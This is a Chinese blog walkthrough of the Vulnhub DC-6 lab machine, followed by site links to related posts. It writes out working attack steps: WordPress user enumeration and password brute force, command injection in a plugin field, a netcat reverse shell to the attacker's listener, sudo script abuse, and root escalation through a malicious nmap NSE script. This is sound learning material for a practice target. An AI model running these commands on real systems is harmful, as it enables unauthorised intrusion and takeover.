靶机渗透之DC-6

最新推荐文章于 2024-08-22 15:38:59 发布
最新推荐文章于 2024-08-22 15:38:59 发布
阅读量1.2k 收藏 9
点赞数 23
分类专栏: 靶机渗透 文章标签: 安全 网络安全 linux web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76227305/article/details/137482295
版权

一、信息收集

nmap扫描一下网段,靶机ip为192.168.234。

nmap -sP 192.168.145.*

再扫一下端口,依旧是老样子22、80端口。

nmap -sT -T4 -p1-65535 192.168.145.234

顺便再扫下网站目录,有个后台登录的网址/wp-login.php。

dirsearch -u http://192.168.145.234/

二、getshell

信息收集的差不多了,开始getshell,先浏览器访问看看。但是直接访问不行,一直在转圈,估计dns解析不了,那我们先到/etc/hosts添加一下。

保存再浏览器访问一下,结果还是不行????有点懵,按道理说应该可以访问了,然后我看了看别人的wp。应该修改为wordy,而不是www.wordy.com,好吧,再修改保存。

然后再访问就可以了,不过好像没啥东西。

访问刚刚扫描到的后台登录网址,一看就知道是wordpress的cms啦,之前写的dc2有说过,如果说看不出来是啥cms,用wappalyzer看一下不就行了嘛。

老规矩,wordpress的cms用wpscan扫描,先扫一下存在的用户。这里有个小坑,如用wpscan扫后台的网址的话扫不出来用户,要扫官网才行也就是我们刚刚访问的这个,也不能说是坑吧,怪我技术不行。

wpscan --url http://wordy/wp-login.php --enumerate vp  //扫后台啥也没有

wpscan --url http://wordy/ -e  //扫官网才有东西

扫描出来五个用户,接下来就是爆破密码了。这里我踩了很大的坑,一开始我用九头蛇爆破,但是换了好多字典都没爆破出来。后来我又用wpscan爆破,也是换了好多字典都不行。但是思路应该是没错的,还是去看看别人的wp,原来在dc6靶机下载的官网里有给提示。

有点逆天,要用kali自带的字典,直接执行它给的命令即可,会生成password.txt字典。如果你直接用rockyou.txt当字典来爆破的话,要挺久的,毕竟里面的密码数量还是蛮多的

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

最后把五个账号保存到dc6.txt,再用wpscan爆破一下就可以了,爆破有点久耐心等下

wpscan --url http://wordy/wp-login.php -P password.txt -U dc6.txt

登录进去,随便点一下,看看能不能找到漏洞

在这里有个输入ip的地方,输入IP会有解析,估计是命令执行

抓个包看看有无命令执行漏洞,抓到包后在ip这里拼接whoami,再重发看看。顺便说一下,抓lookup的包而不是convert的包

可以看到执行了whoami,返回了www-data

确定有命令执行漏洞了,那么剩下的就简单了,直接nc连接反弹shell就行

nc -lnvp 2333 //kali监听
nc -e /bin/bash 192.168.145.171 2333 //替换刚刚的whoami,再重发即可

三、提权

先建立个交互式的shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

随便看看,发现个提示文件

打开看看,里面给出用户graham的密码GSo7isUM1D4

ssh连接graham用户

ssh graham@192.168.145.234

先看看能不能suid提权,结果好像没有

find / -perm -u=s -type f 2>/dev/null

再看看有啥sudo权限的命令,命令没有脚本倒是有一个。属主为jens的脚本,也就是说当我们sudo运行这个脚本的时候,此时我们的身份就为jens。

sudo -l

那我们直接在backups.sh里面写入建立shell的命令,然后再sudo运行那不就获得一个身份为jens的shell了嘛。这里我直接把原本的内容删除替换为下面的,vim命令被禁用了要用vi

#! /bin/bash
/bin/bash

sudo指定用户运行即可,因为属主为jens,所以要指定运行用户为jens。那为啥不需要jens的密码呢,因为上面sudo -l说了NOPASSWD,成功切换。

sudo -u jens ./backups.sh

看看jens有啥sudo权限

sudo -l

一眼看出来nmap提权,但问题是我也是第一次遇见nmap提权啊,怎么办,上网查查如下。已经更新到我之前的sudo提权文章sudo提权

nmap以root运行
echo 'os.execute("/bin/sh")' > getshell.nse
#nse是nmap的插件扩展名
sudo nmap --script=/home/jens/getshell.nse

成功提权,最后到root打开flag即可

四、总结

这个靶机主要涉及重定向、wpscan的使用,这两个都是之前就遇见过的,不算难。唯一有点坑的是要去它那个官网找到那个字典提示,还有这个指定用户运行脚本我也是第一次见,之前都是切换到相对应的用户再运行脚本的,最后一个就是nmap提权,也是第一次见。

最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。

脸红ฅฅ*的思春期
关注
  • 23
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
靶机渗透DC-9
2301_76227305的博客
07-01 1011
这就是DC靶机的最终章了,写的比较详细,基本我走过的弯路都记录下来了,希望对大家有帮助。DC之旅到此结束了,希望大家网安道路越走越远。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
DC系列靶机渗透DC-4
weixin_52515588的博客
06-10 428
打开靶机,扫描IP地址,确定IP地址以后,利用nmap扫描开放的服务。 如上图可知打开了80,22端口,那么我们访问一下。 利用80端口发现了网站登录页面。接下来,我们需要用到用户名和密码。在kali中有一款爆破密码的工具john中有一套密码字典,那么我们就利用这个密码字典进行爆破。 把文件复制到一个路径下面。接下来就需要用到burp爆破。我的burp是安装在主机,那么就需要设置一下。 在IP栏选择一个地址,记住不要选127.0.0.1因为那个是本机的地址,随便选择一个自己喜欢的,填写一个没有被占用的端口
DC系列靶机渗透DC-3
weixin_52515588的博客
06-08 428
利用arp -scan -l扫描主机然后利用nmap查看开放的端口,如上图所示,80端口开放,那么接下来我们可以利用这个信息进行渗透访问一下80端口得到如上图所示的信息。然后使用whatweb对网站进行扫描,得到如下信息,可以知道网站是利用joomla部署的,那么我们就可以利用joomscan扫描 利用扫描工具扫出了网站后台,我们利用浏览器登录 如上图所示。我们在上述扫描结果中,能够看出来使用的joomla版本,接下来我们就可以利用msf查找漏洞 我们发现存在sql注入漏洞根据提示的路径,我们查看文件内容如
渗透测试-靶机DC-1-知识点总结
qq_38678845的博客
01-11 2750
渗透测试靶机DC-1的知识点总结
靶机渗透DC-8
2301_76227305的博客
06-28 517
xxx
DC-6靶机渗透
m0_62008601的博客
05-31 567
攻击机kali:192.168.56.102 靶机dc-6:192.168.56.107 为确保两台服务器在同一网段下,我这里dc-6的网络设置为仅主机网络,kali的设置为桥接模式,这样才能通过kali扫描出dc-6靶机的ip。 配置好环境之后就可以开始操作了 扫描存活的主机 扫描靶机开放的端口 看到开放了80端口和22端口,浏览器进行访问 无法访问,这个问题和前面的一个靶机类似,存在域名解析错误,知道了域名为wordy,就可以去hosts文件(在/etc/hosts).
DC-7靶机渗透详细流程
braty_的博客
02-07 1551
DC-7靶机渗透详细流程
靶机渗透DC-7
2301_76227305的博客
06-26 448
不算太难的靶机,就是一开始可以搜出来源码可能很难想到。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
DC-5靶机渗透测试详细教程
啊醒的博客
05-04 7059
DC-5靶机渗透测试详细教程
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
SQL手工注入漏洞测试(MongoDB数据库)靶场通关攻略
Nai_zui_jiang的博客
08-20 270
得到密码之后,我们就可以获得数据了,先将密码进⾏MD5解密,返回登录⻚进⾏登录,划倒⻚⾯最下 端就可以看到KEY了。如果第⼀个⽤户账号密码登录不了,我们就改变查询的索引“find()[1]"查询 其他的⽤户账号密码登录即可。成功回显1,2,接下来我们开始尝试查询数据库。这里显示用户已禁用,那么我们就换一个用户。得到之后我们就可以继续查询他的表名了。最后我们就可以爆出他表里的数据了。好了这里我们就登录进去了。
HttpWebRequest访问https请求被中止: 未能创建 SSL/TLS 安全通道
sleepingboy888的专栏
08-22 354
C# HttpWebRequest:未能创建SSL/TLS 安全通道
Gartner发布2024年终端和工作空间安全成熟度曲线:24项相关技术发展和应用状况及趋势
最新发布
lurenjia404的博客
08-22 1031
由于攻击者使用人工智能来增强网络钓鱼和终端攻击,企业需要高级安全措施来阻止入侵行为。此技术成熟度曲线可帮助安全和风险管理领导者识别可增强终端和工作空间保护的技术。
CISAW安全运维认证考试重点内容介绍
2401_84945993的博客
08-21 515
数据安全官,CCRC-DSA数据安全评估师,CCRC-DCO数据合规官,CDO首席数据官, ITSS IT服务项目经理,IT服务项目工程师,ISO27001,CISP,软考,CISAW应急服务方向,CISAW渗透测试方向,软考,CCSC网络安全能力认证办理北京青蓝智慧科技。掌握项目综合管理、项目范围管理、项目时间管理、项目成本管理、项目质量管理、项目人力资源管理、项目风险管理和项目采购管理的思想和方法。深入了解网络平安技术的范畴、网络边界划分的原理和方法、典型的网络平安问题和网络攻击手段。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值